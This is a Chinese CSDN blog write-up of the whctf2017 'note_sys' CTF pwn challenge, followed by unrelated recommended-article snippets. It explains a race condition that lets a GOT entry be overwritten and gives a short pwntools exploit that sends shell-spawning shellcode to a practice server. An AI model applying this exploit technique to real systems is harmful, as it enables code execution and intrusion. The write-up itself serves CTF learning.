whctf2017_note_sys(多线程条件竞争漏洞)

最新推荐文章于 2024-08-01 20:49:47 发布
最新推荐文章于 2024-08-01 20:49:47 发布
阅读量576 收藏 1
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 条件竞争
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106694944
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

whctf2017_note_sys(多线程条件竞争漏洞)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,delete功能另启了一个线程

函数里休眠了2s,在休眠之前,end_ptr减去了8

在add函数里,取end_ptr,然后往其指向的地方写一个堆地址。

由此,我们可以多次调用delete,每次end_ptr都会减去8并且休眠2s再做判断,这就存在条件竞争,我们可以在判断之前让end_ptr指向got表,然后add的时候就能往got表里写一个堆地址,我们在堆里布下shellcode即可。

#coding:utf8
from pwn import *

#sh = process('./note_sys')
sh = remote('node3.buuoj.cn',29522)
context(os='linux',arch='amd64')
def add(content):
   sh.sendlineafter('choice:','0')
   sh.sendlineafter('input your note, no more than 250 characters',content)

def delete():
   sh.sendlineafter('choice:','2')
#条件竞争

for i in range(20):
   delete()

add(asm(shellcraft.sh()))

sh.interactive()

 

ha1vk
关注
专栏目录
error: ‘PyArray_Descr {aka struct _PyArray_Descr } ‘ has no member named ‘elsize‘解决方案
weixin_43178406的博客
07-25 4万+
本文主要介绍了error: 'PyArray_Descr {aka struct _PyArray_Descr } ’ has no member named 'elsize’解决方案,希望能对使用Python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
CTF特训营》web部分读书笔记(六)条件竞争
闵行小鱼塘
07-31 514
继续阅读《CTF特训营》web部分,本节是条件竞争
XCTF 4th-WHCTF-2017——Note_sys
05-11 411
64位程序,没有开启NX  #条件竞争 程序逻辑 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <unistd.h> 4 #include <pthread.h> 5 #include <time.h> 6 #includ...
CTF文件上传 与 条件竞争上传
最新发布
2301_81556781的博客
08-01 476
htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。
一个多线程的隐患
anlanghui8293的博客
06-25 102
今天查看项目代码的时候发现下面这段代码: 代码 1 internal MoveTask Dequeue(string host) 2 { 3 if (host == null) 4 throw new ArgumentNullException("host"); 5 6 ...
漏洞挖掘——多线程中的堆内存结构
董哥的黑板报
07-29 1199
一、主线程的堆内存结构 当程序只有一个线程(主线程)时,程序申请的堆是在堆区的(heap) 如果通过查看内存段信息:如果heap与程序的data段相邻,则堆块是有brk系统调用获得的,否则是由mmap系统调用申请的(mmap不与data段相邻) 演示案例 #include <unsitd.h> #include <malloc.h> int main() { ...
CTF条件竞争
夏日 の blog
02-10 2662
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2677
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
采用_beginthread/_beginthreadex函数创建多线程
cbNotes的专栏:不积硅步,无以至千里;不积小流,无以成江海!
12-19 1万+
1、CRT简介: CRT: (C Runtime Library)即C运行时库,是系统运行的基础,包含了c常用的函数集(如:printf,malloc,strcpy等),为运行main做了初始化环境变量、堆、io等资源,并在结束后清理。 在Windows环境下,VC提供的 C run-time library又分为动态运行时库、静态运行时库、多线程、单线程、调试版本(Debug)、发行版本(R
十一.linux多线程同步之互斥锁、信号量、条件
Mr.Wang的博客
05-04 2767
笔记:https://note.youdao.com/ynoteshare1/index.html?id=1b529d966d34b16f3bdd828be48364e4&type=note 目录 一.线程同步之信号量 1、任务:用户从终端输入任意字符然后统计个数显示,输入end则结束 2、信号量的介绍和使用(多线程实行的引入) (1)、信号量初始化 (2)、等待信号量 (3...
为什么要学习汇编?学习汇编有哪些好处?
热门推荐
dvlinker的技术专栏
05-29 4万+
本文详细讲述一个从汇编代码的角度去理解多线程编程问题实例,并详细介绍熟悉汇编代码都有哪些用处。
多线程安全问题
qq_41490873的博客
02-06 211
什么时候多线程会出现问题
WEB-CTF 条件竞争
iamsongyu的博客
10-24 6258
如何来形容这个类型的问题呢,就像是幼儿园发糖吃,每个人只能拿一块,但是如果你跟别人一起再拿一次老师也没办法分辨,毕竟一群小朋友老师也没办法分辨手和对应的人。 关于部分的Burpsuite使用的知识,在前面的https://blog.csdn.net/iamsongyu/article/details/82989478中已经讲了,就不在赘述   这是一个好文章,从上边摘抄和借鉴了不少 htt...
入门分析,多线程竞争为何不安全
01-19 468
简介: 入门级别讲解,分析多线程竞争同一共享资源,运行结果不符预期的原因;故书一简例,讲解何谓 非线程安全 ?以及使用 atomic 和 mutex 来解决此缺陷场景,最终 线程安全 获得预期结果。 文章目录受众场景分析解决方案一(atomic)方案二(mutex)额外探索源码提示 本文初发于 “偕臧的小站”,同步转载于此。 受众 有基本的多线程理论知识,但未曾深入研究 “运行不符预期结果” 的萌新?亦或对多线程未曾了解,道听途说、知识点模糊,实际不甚理解原理的读者。都是本文的最佳读者。若已早熟
网络安全-条件竞争(《CTF特训营》第7章复现)
关注网络安全、云原生安全
12-18 1734
举例 前期准备 在phpStudy的WWW目录下,写两个文件。 标题 condition_race.php内容: <?php $cnt=file_get_contents("count.txt"); //count.txt的初始内容为0 $cnt+=1; echo "This site was visited $cnt times."; file_put_contents("count.txt",$cnt); ?> count.txt内容: 0 打开ph...
条件竞争和恶性条件竞争
weixin_30566111的博客
09-30 304
竞争条件指多个线程或者进程在读写一个共享数据时结果依赖于它们执行的相对时间的情形。 竞争条件发生在当多个进程或者线程在读写数据时,其最终的的结果依赖于多个进程的指令执行顺序。 例如:考虑下面的例子 假设两个进程P1和P2共享了变量a。在某一执行时刻,P1更新a为1,在另一时刻,P2更新a为2。 因此两个任务竞争地写变量a。在这个例子中,竞争的“失败者”(最后更新的进程)决定了...
170916 逆向-WHCTF(BabyRe/CrackMe)
whklhhhh的博客
09-16 3676
1625-5 王子昂 总结《2017年9月16日》 【连续第349天总结】 A. XCTF-Reverse B.CRACKME无壳,C++ 打开是一个简单的输入框和注册按钮 点击注册按钮会弹框“哎,注册码错了,你得换个新的哟!”IDA没有main函数,看起来是MFC写的 查找字符串、断GetDlgText等API都没有结果 说明字符串都被加密过了IDA逐个函数查找,发现有两个函数调用了
php条件竞争漏洞,CTF中的条件竞争漏洞
weixin_36304806的博客
03-20 512
条件竞争是沃特?敲黑板,定义:竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术...
浅析条件竞争漏洞
Atkx's Blog
05-23 3139
目录0x00-前言0x01-基础知识0x02-漏洞分析0x03-CTF中的条件竞争 0x00-前言 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果,简而言之就是并没有考虑线程同步。因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。 0x01-基础知识 先来了解一下关于条件竞争的基础知识 条件竞争: 系统中,最小的运算
phy62xx_adc_application_note.pdf
11-26
phy62xx_adc_application_note.pdf是一份ADC应用指南,主要介绍了PHY62xx系列ADC芯片的性能特点、电路设计原则以及应用实例。该文档详细介绍了PHY62xx系列ADC芯片的各项技术指标,包括分辨率、采样速率、信噪比、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值